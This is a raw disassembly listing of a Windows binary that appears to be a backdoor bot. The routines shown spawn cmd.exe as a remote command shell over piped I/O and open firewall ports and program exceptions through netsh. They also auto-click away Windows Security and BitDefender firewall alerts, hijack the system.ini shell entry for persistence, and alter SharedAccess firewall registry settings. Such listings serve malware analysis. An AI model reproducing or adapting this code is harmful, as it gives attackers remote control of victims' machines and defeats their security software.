call sub_4223F0
mov eax, [ebp+var_4]
mov dword ptr [ebp+var_6C+4], ebx
mov dword ptr [ebp+var_6C], eax
add esp, 10h
fild [ebp+var_6C]
fmul flt_42F31C
fstp [esp+0Ch+var_C]
call sub_4242B0
call sub_4234BC
push [ebp+var_4]
mov [esi+1Ch], eax
mov [esi+14h], eax
lea eax, [esi+20h]
push edi
push eax
mov [esi+18h], ebx
call sub_4223F0
mov eax, [ebp+var_4]
add esp, 14h
add eax, 20h
test al, 3
mov [ebp+arg_D8], eax
jz short loc_413EE5
loc_413EDA: ; CODE XREF: sub_41391C+5C1�j
inc eax
test al, 3
jnz short loc_413EDA
mov [ebp+arg_D8], eax
loc_413EE5: ; CODE XREF: sub_41391C+5BC�j
lea ecx, [ebp+var_2C]
push 1Ch
add eax, esi
push ecx
push eax
call sub_4223F0
add [ebp+arg_D8], 1Ch
push edi
call sub_4230B3
push 18h
lea eax, [ebp+var_44]
push ebx
push eax
call sub_4221F0
push 14h
lea eax, [ebp+var_80]
push ebx
push eax
mov [ebp+var_44], 5
mov [ebp+var_43], bl
mov [ebp+var_42], bl
mov [ebp+var_41], 3
mov [ebp+var_40], 10h
mov [ebp+var_3A], bx
mov [ebp+var_38], ebx
mov [ebp+var_30], bx
mov [ebp+var_2E], 1Fh
call sub_4221F0
add esp, 28h
push ebx
push ebx
push 1
push ebx
call dword_42F094 ; CreateEventA
mov [ebp+var_70], eax
mov [ebp+var_4], ebx
jmp short loc_413F57
; ---------------------------------------------------------------------------
loc_413F54: ; CODE XREF: sub_41391C+679�j
; sub_41391C+6B9�j
mov esi, dword ptr [ebp+var_C]
loc_413F57: ; CODE XREF: sub_41391C+636�j
cmp [ebp+var_4], 2
jge loc_414023
push 1
push 10B8h
push [ebp+arg_D8]
inc [ebp+var_4]
push esi
lea esi, [ebp+var_44]
sub esp, 18h
push 6
pop ecx
mov edi, esp
push dword ptr [ebp+var_C+4]
rep movsd
call sub_41382E
add esp, 2Ch
test al, al
jz loc_414020
cmp [ebp+var_70], ebx
jz short loc_413F54
lea eax, [ebp+var_80]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_60E0]
push 2000h
push eax
push dword ptr [ebp+var_C+4]
call dword_42F054 ; ReadFile
test eax, eax
jnz short loc_413FC5
call dword_42F068 ; RtlGetLastWin32Error
cmp eax, 3E5h
jnz short loc_41403F
loc_413FC5: ; CODE XREF: sub_41391C+69A�j
push 64h
push [ebp+var_70]
call dword_42F064 ; WaitForSingleObject
cmp eax, 102h
jnz loc_413F54
movzx eax, word_439014
push eax
lea esi, [ebp+arg_8]
sub esp, 0D0h
push 34h
pop ecx
mov edi, esp
rep movsd
call sub_401160
add esp, 0D4h
push 7D0h
call dword_42F15C ; Sleep
mov eax, [ebp+arg_C0]
lea eax, [eax+eax*8]
lea eax, ds:432090h[eax*8]
inc dword ptr [eax]
xor eax, eax
inc eax
jmp short loc_414041
; ---------------------------------------------------------------------------
loc_414020: ; CODE XREF: sub_41391C+670�j
mov esi, dword ptr [ebp+var_C]
loc_414023: ; CODE XREF: sub_41391C+63F�j
push dword ptr [ebp+var_C+4]
mov edi, dword_42F038
call edi ; dword_42F038
push esi
call sub_4230B3
cmp [ebp+var_70], ebx
pop ecx
jz short loc_41403F
push [ebp+var_70]
call edi ; dword_42F038
loc_41403F: ; CODE XREF: sub_41391C+256�j
; sub_41391C+423�j ...
xor eax, eax
loc_414041: ; CODE XREF: sub_41391C+702�j
pop edi
pop esi
pop ebx
leave
retn
sub_41391C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
push esi
inc ebx
push edi
lea eax, [ebp+10h]
push ebx
push eax
call sub_401AB3
pop ecx
cmp eax, ebx
pop ecx
jnz short loc_414063
loc_41405F: ; CODE XREF: .text:00414066�j
push 0
jmp short loc_41406E
; ---------------------------------------------------------------------------
loc_414063: ; CODE XREF: .text:0041405D�j
cmp eax, 2
jz short loc_41405F
cmp eax, 3
jnz short loc_414097
push ebx
loc_41406E: ; CODE XREF: .text:00414061�j
sub esp, 0D0h
lea esi, [ebp+10h]
push 34h
pop ecx
mov edi, esp
push dword ptr [ebp+0Ch]
rep movsd
push dword ptr [ebp+8]
call sub_41391C
add esp, 0DCh
test eax, eax
jz short loc_414097
mov eax, ebx
jmp short loc_414099
; ---------------------------------------------------------------------------
loc_414097: ; CODE XREF: .text:0041406B�j
; .text:00414091�j
xor eax, eax
loc_414099: ; CODE XREF: .text:00414095�j
pop edi
pop esi
pop ebx
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41409E proc near ; CODE XREF: sub_401477+56�p
; sub_403B2C+2121�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call sub_4220FC
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
inc eax
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul dbl_42F320
call sub_4234BC
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_41409E endp
; =============== S U B R O U T I N E =======================================
sub_4140CF proc near ; CODE XREF: sub_401AB3+AA�p
; .text:0040B805�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_45434C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_4140F7
push [esp+arg_0]
call dword_454398 ; gethostbyname
test eax, eax
jnz short loc_4140F0
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_4140F0: ; CODE XREF: sub_4140CF+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_4140F7: ; CODE XREF: sub_4140CF+D�j
retn
sub_4140CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4140F8 proc near ; DATA XREF: sub_41A1C8+4C�o
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push 2
push [ebp+arg_0]
lea eax, [ebp+var_8]
push eax
call sub_41EF08
mov esi, offset a@ ; "@"
push esi
push [ebp+var_4]
call sub_422248
push esi
push 0
call sub_422248
push eax
call sub_4140CF
add esp, 20h
mov [ebp+arg_0], eax
push eax
call dword_45439C ; inet_ntoa
push eax
push offset dword_4552D0
call dword_42F04C ; lstrcpyA
push 2
lea eax, [ebp+arg_0]
push 4
push eax
call dword_4542C0 ; gethostbyaddr
pop esi
test eax, eax
push 9Fh
jz short loc_41415D
push dword ptr [eax]
jmp short loc_414162
; ---------------------------------------------------------------------------
loc_41415D: ; CODE XREF: sub_4140F8+5F�j
push offset aCouldnTResolve ; "Couldn't resolve"
loc_414162: ; CODE XREF: sub_4140F8+63�j
push offset dword_4552E8
call sub_4222F0
add esp, 0Ch
xor eax, eax
leave
retn
sub_4140F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414173 proc near ; CODE XREF: sub_401160+D2�p
; sub_403B2C+1D0B�p ...
var_30 = byte ptr -30h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
cmp [ebp+arg_0], 0
push esi
push edi
jz loc_41426B
push offset byte_44D6A4
push [ebp+arg_0]
call sub_422760
pop ecx
test eax, eax
pop ecx
jz loc_41426B
push 20h
lea eax, [ebp+var_30]
push [ebp+arg_0]
push eax
call sub_4222F0
mov esi, offset a__0 ; "."
lea eax, [ebp+var_30]
push esi
push eax
call sub_422248
add esp, 14h
mov [ebp+var_10], eax
test eax, eax
jz loc_41426B
xor edi, edi
inc edi
loc_4141CA: ; CODE XREF: sub_414173+71�j
push esi
push 0
call sub_422248
pop ecx
mov [ebp+edi*4+var_10], eax
test eax, eax
pop ecx
jz loc_41426B
inc edi
cmp edi, 4
jl short loc_4141CA
mov esi, [ebp+var_10]
push offset a10 ; "10"
push esi
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_414266
push offset a172 ; "172"
push esi
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_41421E
push offset a16 ; "16"
push [ebp+var_C]
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_414266
loc_41421E: ; CODE XREF: sub_414173+96�j
push offset a192 ; "192"
push esi
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_414242
push offset a168 ; "168"
push [ebp+var_C]
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_414266
loc_414242: ; CODE XREF: sub_414173+BA�j
push offset a90 ; "90"
push esi
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_41426B
push offset a0 ; "0"
push [ebp+var_C]
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_41426B
loc_414266: ; CODE XREF: sub_414173+85�j
; sub_414173+A9�j ...
xor eax, eax
inc eax
jmp short loc_41426D
; ---------------------------------------------------------------------------
loc_41426B: ; CODE XREF: sub_414173+C�j
; sub_414173+23�j ...
xor eax, eax
loc_41426D: ; CODE XREF: sub_414173+F6�j
pop edi
pop esi
leave
retn
sub_414173 endp
; =============== S U B R O U T I N E =======================================
sub_414271 proc near ; CODE XREF: sub_40C847+4D0�p
; sub_40C847+515�p ...
xor ax, ax
retn
sub_414271 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414275 proc near ; CODE XREF: sub_4033F0+2F�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push 0
push 1
push 2
call dword_454394 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4142D7
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_4221F0
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_4]
call dword_454314 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4140CF
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_4542AC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4142DC
push esi
call dword_4543AC ; closesocket
loc_4142D7: ; CODE XREF: sub_414275+18�j
or eax, 0FFFFFFFFh
jmp short loc_4142DE
; ---------------------------------------------------------------------------
loc_4142DC: ; CODE XREF: sub_414275+59�j
mov eax, esi
loc_4142DE: ; CODE XREF: sub_414275+65�j
pop esi
leave
retn
sub_414275 endp
; =============== S U B R O U T I N E =======================================
sub_4142E1 proc near ; CODE XREF: sub_414311+2A�p
; sub_414349+59�p ...
mov eax, dword_455EC0
push esi
mov esi, dword_42F038
cmp eax, 0FFFFFFFFh
jz short loc_4142F5
push eax
call esi ; dword_42F038
loc_4142F5: ; CODE XREF: sub_4142E1+F�j
mov eax, dword_455ED8
cmp eax, 0FFFFFFFFh
jz short loc_414302
push eax
call esi ; dword_42F038
loc_414302: ; CODE XREF: sub_4142E1+1C�j
mov eax, dword_455EB8
cmp eax, 0FFFFFFFFh
jz short loc_41430F
push eax
call esi ; dword_42F038
loc_41430F: ; CODE XREF: sub_4142E1+29�j
pop esi
retn
sub_4142E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414311 proc near ; CODE XREF: sub_403B2C+3D3B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_422120
pop ecx
mov [ebp+var_4], eax
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
push [ebp+arg_0]
push dword_455ED4
call dword_42F07C ; WriteFile
test eax, eax
jnz short loc_414344
call sub_4142E1
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_414344: ; CODE XREF: sub_414311+28�j
xor eax, eax
inc eax
leave
retn
sub_414311 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414349 proc near ; CODE XREF: sub_4143AB+DB�p
; sub_4143AB+FA�p ...
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 1000h
call sub_4220C0
push offset byte_44D6A4
push [ebp+arg_0]
call dword_42F0A8 ; lstrcmpA
test eax, eax
jz short loc_41438B
push 1F4h
call dword_42F15C ; Sleep
push [ebp+arg_8]
push offset aS_1 ; "%s"
push [ebp+arg_0]
push [ebp+arg_4]
call sub_4104F6
add esp, 10h
jmp short loc_4143A7
; ---------------------------------------------------------------------------
loc_41438B: ; CODE XREF: sub_414349+1D�j
push [ebp+arg_8]
lea eax, [ebp+var_1000]
push offset aS_1 ; "%s"
push eax
call sub_422063
add esp, 0Ch
call sub_4142E1
loc_4143A7: ; CODE XREF: sub_414349+40�j
xor eax, eax
leave
retn
sub_414349 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4143AB proc near ; DATA XREF: sub_414508+177�o
var_100C = byte ptr -100Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_4220C0
push ebx
push esi
push edi
mov esi, 1000h
xor edi, edi
mov ebx, offset dword_455EF0
loc_4143C7: ; CODE XREF: sub_4143AB+7D�j
; sub_4143AB+E3�j
push esi
lea eax, [ebp+var_100C]
push edi
push eax
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_4]
push edi
push edi
push eax
lea eax, [ebp+var_100C]
push esi
push eax
push dword_455EC0
call dword_42F0B0 ; PeekNamedPipe
test eax, eax
jz loc_414499
cmp [ebp+var_4], edi
jnz short loc_41442A
lea eax, [ebp+var_8]
push eax
push dword_455EB8
call dword_42F0AC ; GetExitCodeProcess
test eax, eax
jz short loc_414420
cmp [ebp+var_8], 103h
jnz loc_4144BD
loc_414420: ; CODE XREF: sub_4143AB+66�j
push 0Ah
call dword_42F15C ; Sleep
jmp short loc_4143C7
; ---------------------------------------------------------------------------
loc_41442A: ; CODE XREF: sub_4143AB+52�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_414441
loc_414431: ; CODE XREF: sub_4143AB+94�j
cmp [ebp+eax+var_100C], 0Ah
jz short loc_414493
inc eax
cmp eax, [ebp+var_4]
jb short loc_414431
loc_414441: ; CODE XREF: sub_4143AB+84�j
mov [ebp+var_4], 200h
loc_414448: ; CODE XREF: sub_4143AB+EC�j
push esi
lea eax, [ebp+var_100C]
push edi
push eax
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_C]
push edi
push eax
push [ebp+var_4]
lea eax, [ebp+var_100C]
push eax
push dword_455EC0
call dword_42F054 ; ReadFile
test eax, eax
jz short loc_4144E5
lea eax, [ebp+var_100C]
push eax
push dword_455EDC
push ebx
call sub_414349
add esp, 0Ch
jmp loc_4143C7
; ---------------------------------------------------------------------------
loc_414493: ; CODE XREF: sub_4143AB+8E�j
inc eax
mov [ebp+var_4], eax
jmp short loc_414448
; ---------------------------------------------------------------------------
loc_414499: ; CODE XREF: sub_4143AB+49�j
push offset aCouldNotReadDa ; "Could not read data from proccess.\r\n"
push dword_455EDC
push ebx
call sub_414349
push [ebp+arg_0]
call sub_41C059
add esp, 10h
push 1
call dword_42F150 ; ExitThread
loc_4144BD: ; CODE XREF: sub_4143AB+6F�j
call sub_4142E1
push offset aProccessTermin ; "Proccess terminated.\r\n"
push dword_455EDC
push ebx
call sub_414349
push [ebp+arg_0]
call sub_41C059
add esp, 10h
push edi
call dword_42F150 ; ExitThread
loc_4144E5: ; CODE XREF: sub_4143AB+CB�j
push offset aCouldNotReadDa ; "Could not read data from proccess.\r\n"
push dword_455EDC
push ebx
call sub_414349
push [ebp+arg_0]
call sub_41C059
add esp, 10h
push edi
call dword_42F150 ; ExitThread
sub_4143AB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414508 proc near ; CODE XREF: sub_403B2C+3C2C�p
var_1174 = byte ptr -1174h
var_174 = byte ptr -174h
var_70 = dword ptr -70h
var_44 = dword ptr -44h
var_40 = word ptr -40h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1174h
call sub_4220C0
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
mov dword_455EDC, eax
call sub_4142E1
xor esi, esi
lea eax, [ebp+var_174]
push esi
push eax
push 104h
mov edi, offset aCmd_exe ; "cmd.exe"
push esi
push edi
push esi
call dword_4543D4 ; SearchPathA
test eax, eax
jz loc_414608
lea eax, [ebp+var_18]
mov ebx, dword_42F0B8
push esi
push eax
lea eax, [ebp+var_8]
mov [ebp+var_18], 0Ch
push eax
lea eax, [ebp+var_C]
push eax
mov [ebp+var_10], 1
mov [ebp+var_14], esi
call ebx ; dword_42F0B8
test eax, eax
jz loc_414608
lea eax, [ebp+var_18]
push esi
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push eax
call ebx ; dword_42F0B8
test eax, eax
jz short loc_414608
mov ebx, dword_42F040
push 3
push esi
push esi
push offset dword_455ED4
call ebx ; dword_42F040
push eax
push [ebp+var_4]
call ebx ; dword_42F040
push eax
call dword_42F0B4 ; DuplicateHandle
test eax, eax
jz short loc_414608
push 10h
lea eax, [ebp+var_28]
push esi
push eax
call sub_4221F0
push 44h
lea eax, [ebp+var_70]
pop ebx
push ebx
push esi
push eax
call sub_4221F0
mov eax, [ebp+arg_4]
add esp, 18h
mov [ebp+var_38], eax
mov eax, [ebp+var_8]
mov [ebp+var_34], eax
mov [ebp+var_30], eax
lea eax, [ebp+var_28]
mov [ebp+var_70], ebx
push eax
lea eax, [ebp+var_70]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
lea eax, [ebp+var_174]
push edi
push eax
mov [ebp+var_44], 101h
mov [ebp+var_40], si
call dword_42F078 ; CreateProcessA
test eax, eax
jnz short loc_414610
loc_414608: ; CODE XREF: sub_414508+3C�j
; sub_414508+6A�j ...
or eax, 0FFFFFFFFh
jmp loc_4146B4
; ---------------------------------------------------------------------------
loc_414610: ; CODE XREF: sub_414508+FE�j
push [ebp+arg_4]
mov edi, dword_42F038
call edi ; dword_42F038
mov eax, [ebp+var_C]
push [ebp+var_24]
mov dword_455EC0, eax
mov eax, [ebp+var_4]
mov dword_455ED8, eax
mov eax, [ebp+var_28]
mov dword_455EB8, eax
call edi ; dword_42F038
cmp [ebp+arg_0], esi
jz short loc_414642
push [ebp+arg_0]
jmp short loc_414647
; ---------------------------------------------------------------------------
loc_414642: ; CODE XREF: sub_414508+133�j
push offset byte_44D6A4
loc_414647: ; CODE XREF: sub_414508+138�j
push offset dword_455EF0
call sub_422063
pop ecx
mov ebx, offset aCkdai0gd9lr_ ; "ckdai0Gd9lr."
pop ecx
push ebx
push offset aSCmdPrompt ; "%s CMD Prompt"
push 0Ah
call sub_41BED7
mov edi, eax
mov ecx, [ebp+var_20]
imul edi, 1018h
add esp, 0Ch
mov dword_46D410[edi], ecx
lea ecx, [ebp+var_2C]
push ecx
push esi
push eax
push offset sub_4143AB
push esi
push esi
call dword_42F158 ; CreateThread
cmp eax, esi
mov dword_46D414[edi], eax
jnz short loc_4146B2
call dword_42F068 ; RtlGetLastWin32Error
push eax
push ebx
lea eax, [ebp+var_1174]
push offset aSFailedToSta_5 ; "%s Failed to start IO thread, error: <%"...
push eax
call sub_422063
add esp, 10h
loc_4146B2: ; CODE XREF: sub_414508+18C�j
xor eax, eax
loc_4146B4: ; CODE XREF: sub_414508+103�j
pop edi
pop esi
pop ebx
leave
retn
sub_414508 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4146B9 proc near ; CODE XREF: sub_412267+3FC�p
var_404 = byte ptr -404h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
mov esi, offset loc_439030
push edi
lea eax, [ebp+var_404]
push esi
push eax
call dword_42F04C ; lstrcpyA
lea eax, [ebp+var_404]
push offset aEnabled ; ":*:Enabled:"
push eax
call sub_423270
lea eax, [ebp+var_404]
push offset aSystem_0 ; "SYSTEM"
push eax
call sub_423270
mov edi, dword_42F008
add esp, 10h
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push 0
push offset aSystemCurren_3 ; "SYSTEM\\CurrentControlSet\\Services\\Share"...
push 80000002h
call edi ; dword_42F008
lea eax, [ebp+var_404]
push eax
call sub_422120
pop ecx
mov ebx, dword_42F00C
push eax
lea eax, [ebp+var_404]
push eax
push 1
push 0
push esi
push [ebp+var_4]
call ebx ; dword_42F00C
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push 0
push offset aSystemCurren_4 ; "SYSTEM\\CurrentControlSet\\Services\\Share"...
push 80000002h
call edi ; dword_42F008
lea eax, [ebp+var_404]
push eax
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_404]
push eax
push 1
push 0
push esi
push [ebp+var_4]
call ebx ; dword_42F00C
pop edi
pop esi
pop ebx
leave
retn
sub_4146B9 endp
; =============== S U B R O U T I N E =======================================
sub_41477A proc near ; DATA XREF: sub_412267+418�o
push ebx
mov ebx, dword_42F15C
push ebp
push esi
xor ebp, ebp
loc_414785: ; CODE XREF: sub_41477A+33�j
push offset aWindowsSecurit ; "Windows Security Alert"
push ebp
call dword_45431C ; FindWindowA
mov esi, eax
cmp esi, ebp
jnz short loc_4147AF
push offset aBitdefenderFir ; "BitDefender Firewall Alert"
push ebp
call dword_45431C ; FindWindowA
mov esi, eax
cmp esi, ebp
jnz short loc_4147D1
push 1Eh
call ebx ; dword_42F15C
jmp short loc_414785
; ---------------------------------------------------------------------------
loc_4147AF: ; CODE XREF: sub_41477A+1B�j
push ebp
push 68h
push 111h
push esi
call dword_454360 ; SendMessageA
jmp short loc_4147C4
; ---------------------------------------------------------------------------
loc_4147C0: ; CODE XREF: sub_41477A+53�j
push 32h
call ebx ; dword_42F15C
loc_4147C4: ; CODE XREF: sub_41477A+44�j
push esi
call dword_4542A0 ; IsWindow
test eax, eax
jnz short loc_4147C0
jmp short loc_414806
; ---------------------------------------------------------------------------
loc_4147D1: ; CODE XREF: sub_41477A+2D�j
push edi
push ebp
mov edi, 111h
push 4Dh
push edi
push esi
call dword_454360 ; SendMessageA
push ebp
push 1
push edi
push esi
call dword_454360 ; SendMessageA
push esi
call dword_4542A0 ; IsWindow
pop edi
jmp short loc_414802
; ---------------------------------------------------------------------------
loc_4147F7: ; CODE XREF: sub_41477A+8A�j
push 32h
call ebx ; dword_42F15C
push esi
call dword_4542A0 ; IsWindow
loc_414802: ; CODE XREF: sub_41477A+7B�j
test eax, eax
jnz short loc_4147F7
loc_414806: ; CODE XREF: sub_41477A+55�j
push ebp
call dword_42F150 ; ExitThread
pop esi
pop ebp
pop ebx
sub_41477A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_414810 proc near ; DATA XREF: sub_412267+408�o
var_F74 = byte ptr -0F74h
var_F5C = byte ptr -0F5Ch
var_F4C = byte ptr -0F4Ch
var_E18 = byte ptr -0E18h
var_C30 = byte ptr -0C30h
var_A00 = byte ptr -0A00h
var_858 = byte ptr -858h
var_470 = byte ptr -470h
sub esp, 0F04h
lea eax, [esp+0F04h+var_A00]
push ebx
push ebp
push esi
push edi
push offset aFirewallSetP_0 ; "firewall set portopening TCP 1013 BS"
push 200h
push eax
call sub_42219B
add esp, 0Ch
mov esi, dword_42F23C
xor ebp, ebp
lea eax, [esp+0F14h+var_A00]
push ebp
push ebp
mov ebx, offset aNetsh ; "netsh"
push eax
mov edi, offset aOpen ; "open"
push ebx
push edi
push ebp
call esi ; dword_42F23C
push offset aFirewallSetP_1 ; "firewall set portopening TCP 8080 PORT1"...
lea eax, [esp+0F30h+var_E18]
push 200h
push eax
call sub_42219B
add esp, 0Ch
lea eax, [esp+0F2Ch+var_E18]
push ebp
push ebp
push eax
push ebx
push edi
push ebp
call esi ; dword_42F23C
push offset aFirewallSetP_2 ; "firewall set portopening TCP 8081 PORT2"...
lea eax, [esp+0F48h+var_C30]
push 200h
push eax
call sub_42219B
add esp, 0Ch
lea eax, [esp+0F44h+var_C30]
push ebp
push ebp
push eax
push ebx
push edi
push ebp
call esi ; dword_42F23C
lea eax, [esp+0F5Ch+var_F4C]
push 104h
push eax
push ebp
call dword_42F074 ; GetModuleHandleA
push eax
call dword_42F154 ; GetModuleFileNameA
lea eax, [esp+0F6Ch+var_F5C]
push eax
push offset aFirewallAddAll ; "firewall add allowedprogram \"%s\" workst"...
lea eax, [esp+0F74h+var_858]
push 400h
push eax
call sub_42219B
add esp, 10h
lea eax, [esp+0F6Ch+var_858]
push ebp
push ebp
push eax
push ebx
push edi
push ebp
call esi ; dword_42F23C
lea eax, [esp+0F84h+var_F74]
push eax
push offset aFirewallSetAll ; "firewall set allowedprogram \"%s\" workst"...
lea eax, [esp+0F8Ch+var_470]
push 400h
push eax
call sub_42219B
add esp, 10h
lea eax, [esp+0F84h+var_470]
push ebp
push ebp
push eax
push ebx
push edi
push ebp
call esi ; dword_42F23C
push ebp
call dword_42F150 ; ExitThread
pop edi
pop esi
pop ebp
pop ebx
sub_414810 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414926 proc near ; DATA XREF: sub_402190+3F�o
var_200 = byte ptr -200h
push ebp
mov ebp, esp
sub esp, 200h
push dword_44D680
push offset aDebugOpenedNet ; "(Debug): opened netsh firewall for FTPD"...
call sub_424496
push dword_44D680
lea eax, [ebp+var_200]
push offset aFirewallSetPor ; "firewall set portopening TCP %d FD"
push 200h
push eax
call sub_42219B
add esp, 18h
lea eax, [ebp+var_200]
push 0
push 0
push eax
push offset aNetsh ; "netsh"
push offset aOpen ; "open"
push 0
call dword_42F23C
push 0
call dword_42F150 ; ExitThread
sub_414926 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414983 proc near ; DATA XREF: sub_412267+428�o
; sub_414FE3+6D�o
var_410 = byte ptr -410h
var_30C = byte ptr -30Ch
var_304 = byte ptr -304h
var_208 = byte ptr -208h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 304h
push esi
mov esi, 104h
lea eax, [ebp+var_208]
push esi
push eax
push 0
call dword_42F074 ; GetModuleHandleA
push eax
call dword_42F154 ; GetModuleFileNameA
lea eax, [ebp+var_208]
push eax
lea eax, [ebp+var_304]
push offset aExplorer_exeS ; "explorer.exe \"%s\""
push eax
call sub_422063
add esp, 0Ch
lea eax, [ebp+var_104]
push esi
push eax
call dword_42F0C0 ; GetWindowsDirectoryA
lea eax, [ebp+var_104]
push offset aSystem_ini ; "\\system.ini"
push eax
call sub_423270
pop ecx
lea eax, [ebp+var_104]
pop ecx
push eax
lea eax, [ebp+var_304]
push eax
push offset aShell ; "shell"
push offset aBoot ; "boot"
call dword_42F160 ; WritePrivateProfileStringA
lea eax, [ebp+var_208]
push eax
call sub_422120
mov esi, dword_42F244
pop ecx
push eax
lea eax, [ebp+var_208]
push eax
call esi ; dword_42F244
lea eax, [ebp+var_104]
push eax
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_104]
push eax
call esi ; dword_42F244
push 0
call dword_42F150 ; ExitThread
pop esi
loc_414A40: ; CODE XREF: sub_414CF1+4�p
push ebp
mov ebp, esp
sub esp, 410h
push ebx
push esi
mov esi, 104h
push edi
xor ebx, ebx
push esi
lea eax, [ebp+var_30C]
push ebx
push eax
call sub_4221F0
push esi
lea eax, [ebp+var_208]
push ebx
push eax
call sub_4221F0
push esi
lea eax, [ebp+var_104]
push ebx
push eax
call sub_4221F0
push esi
lea eax, [ebp+var_410]
push ebx
push eax
call sub_4221F0
mov eax, [ebp+arg_0]
add esp, 30h
dec eax
jz loc_414BDC
dec eax
jz loc_414B68
dec eax
jz short loc_414AF4
dec eax
jnz loc_414CB2
push ebx
lea eax, [ebp+var_208]
push 18h
push eax
push ebx
call dword_42F234
loc_414ABA: ; CODE XREF: sub_414983+2AD�j
lea eax, [ebp+var_208]
push eax
lea eax, [ebp+var_30C]
push esi
push eax
call sub_42219B
lea eax, [ebp+var_208]
push offset loc_439030
push eax
push offset dword_43C270
lea eax, [ebp+var_104]
push esi
push eax
call sub_42219B
add esp, 20h
jmp loc_414CB2
; ---------------------------------------------------------------------------
loc_414AF4: ; CODE XREF: sub_414983+11D�j
push ebx
lea eax, [ebp+var_208]
push 25h
push eax
push ebx
call dword_42F234
lea eax, [ebp+var_208]
push eax
lea eax, [ebp+var_30C]
push esi
push eax
call sub_42219B
lea eax, [ebp+var_208]
push offset loc_439030
push eax
push offset aSWinsS ; "%s\\wins\\%s"
lea eax, [ebp+var_104]
push esi
push eax
call sub_42219B
lea eax, [ebp+var_104]
push 1
push eax
mov edi, offset dword_439134
push offset dword_439590
push edi
push 80000001h
call sub_41A8F2
lea eax, [ebp+var_104]
push 1
push eax
push offset dword_439590
jmp loc_414CA3
; ---------------------------------------------------------------------------
loc_414B68: ; CODE XREF: sub_414983+116�j
push ebx
lea eax, [ebp+var_208]
push 25h
push eax
push ebx
call dword_42F234
lea eax, [ebp+var_208]
push eax
lea eax, [ebp+var_30C]
push esi
push eax
call sub_42219B
lea eax, [ebp+var_208]
push offset loc_439030
push eax
